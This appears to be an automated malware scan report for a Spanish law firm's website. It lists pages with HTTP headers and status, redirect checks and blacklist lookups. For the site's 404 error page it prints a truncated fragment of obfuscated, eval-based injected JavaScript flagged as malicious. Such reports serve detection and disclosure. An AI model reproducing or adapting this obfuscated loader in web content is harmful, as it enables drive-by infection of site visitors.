Scanned pages/files
Request | Server response | Status |
http://spanishlawyer.net/ | HTTP/1.1 200 OK Cache-Control: max-age=864000 Date: Wed, 07 May 2014 14:28:08 GMT Accept-Ranges: bytes ETag: "6a23687ae30cf1:81b9" Server: Microsoft-IIS/6.0 Content-Length: 15125 Content-Location: http://spanishlawyer.net/index.htm Content-Type: text/html Last-Modified: Tue, 24 Dec 2013 20:05:22 GMT X-Powered-By: ASP.NET X-Server: BORON | clean |
http://spanishlawyer.net/index.htm | 200 OK Content-Length: 15125 Content-Type: text/html | clean |
http://www.spanishlawyer.net/inc/foot.js?&FrameTarget=_self&target=BLANK&d= | 200 OK Content-Length: 1799 Content-Type: application/x-javascript | clean |
http://www.spanishlawyer.net/inc/footer.js?&FrameTarget=_self&target=BLANK&d= | 200 OK Content-Length: 3086 Content-Type: application/x-javascript | clean |
http://spanishlawyer.net/about.htm | 200 OK Content-Length: 12876 Content-Type: text/html | clean |
http://spanishlawyer.net/contract.htm | 200 OK Content-Length: 10788 Content-Type: text/html | clean |
http://spanishlawyer.net/property.htm | 200 OK Content-Length: 16435 Content-Type: text/html | clean |
http://spanishlawyer.net/wills.htm | 200 OK Content-Length: 11324 Content-Type: text/html | clean |
http://spanishlawyer.net/costs.htm | 200 OK Content-Length: 15943 Content-Type: text/html | clean |
http://spanishlawyer.net/contact.htm | 200 OK Content-Length: 11308 Content-Type: text/html | clean |
http://spanishlawyer.net/fly2buy.htm | 200 OK Content-Length: 14261 Content-Type: text/html | clean |
http://spanishlawyer.net/ftb1.htm | 200 OK Content-Length: 7849 Content-Type: text/html | clean |
http://spanishlawyer.net/test404page.js | HTTP/1.1 200 OK Cache-Control: max-age=864000 Date: Wed, 07 May 2014 14:28:12 GMT Accept-Ranges: bytes ETag: "387f364fe30cf1:81b9" Server: Microsoft-IIS/6.0 Content-Length: 9070 Content-Location: http://spanishlawyer.net/error/index.htm?404;http://spanishlawyer.net:80/test404page.js Content-Type: text/html Last-Modified: Tue, 24 Dec 2013 20:04:10 GMT X-Powered-By: ASP.NET X-Server: BORON | clean |
http://spanishlawyer.net/error/index.htm?404;http://spanishlawyer.net:80/test404page.js | 200 OK Content-Length: 9070 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var s=new String();try{document.asd.asd}catch(q){r=1;c=String;}if(r&&document.createTextNode)y=2;e=eval;m=[4.5*y,18/y,52.5*y,204/y,16*y,80/y,50*y,222/y,49.5*y,234/y,54.5*y,202/y,55*y,232/y,23*y,206/y,50.5*y,232/y,34.5*y,216/y,50.5*y,218/y,50.5*y,220/y,58*y,230/y,33*y,242/y,42*y,194/y,51.5*y,156/y,48.5*y,218/y,50.5*y,80/y,19.5*y,196/y,55.5*y,200/y,60.5*y,78/y,20.5*y,182/y,24*y,186/y,20.5*y,246/y,4.5*y,18/y,4.5*y,210/y,51*y,228/y,48.5*y,218/y,50.5*y,228/y,20*y,82/y,29.5*y,18/y,4.5*y,250/y, Antivirus reports:
| ||
http://spanishlawyer.net/ftb2.htm | 200 OK Content-Length: 7820 Content-Type: text/html | clean |
http://spanishlawyer.net/ftb3.htm | 200 OK Content-Length: 7825 Content-Type: text/html | clean |
http://spanishlawyer.net/ftb4.htm | 200 OK Content-Length: 7827 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: spanishlawyer.net
Result:
HTTP/1.1 200 OK
Cache-Control: max-age=864000
Date: Wed, 07 May 2014 14:28:08 GMT
Accept-Ranges: bytes
ETag: "6a23687ae30cf1:81b9"
Server: Microsoft-IIS/6.0
Content-Length: 15125
Content-Location: http://spanishlawyer.net/index.htm
Content-Type: text/html
Last-Modified: Tue, 24 Dec 2013 20:05:22 GMT
X-Powered-By: ASP.NET
X-Server: BORON
...15125 bytes of data.
GET / HTTP/1.1
Host: spanishlawyer.net
Result:
HTTP/1.1 200 OK
Cache-Control: max-age=864000
Date: Wed, 07 May 2014 14:28:08 GMT
Accept-Ranges: bytes
ETag: "6a23687ae30cf1:81b9"
Server: Microsoft-IIS/6.0
Content-Length: 15125
Content-Location: http://spanishlawyer.net/index.htm
Content-Type: text/html
Last-Modified: Tue, 24 Dec 2013 20:05:22 GMT
X-Powered-By: ASP.NET
X-Server: BORON
...15125 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: spanishlawyer.net
Referer: http://www.google.com/search?q=spanishlawyer.net
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: spanishlawyer.net
Referer: http://www.google.com/search?q=spanishlawyer.net
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=spanishlawyer.net
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://spanishlawyer.net/
Result: spanishlawyer.net is not infected or malware details are not published yet.
Result: spanishlawyer.net is not infected or malware details are not published yet.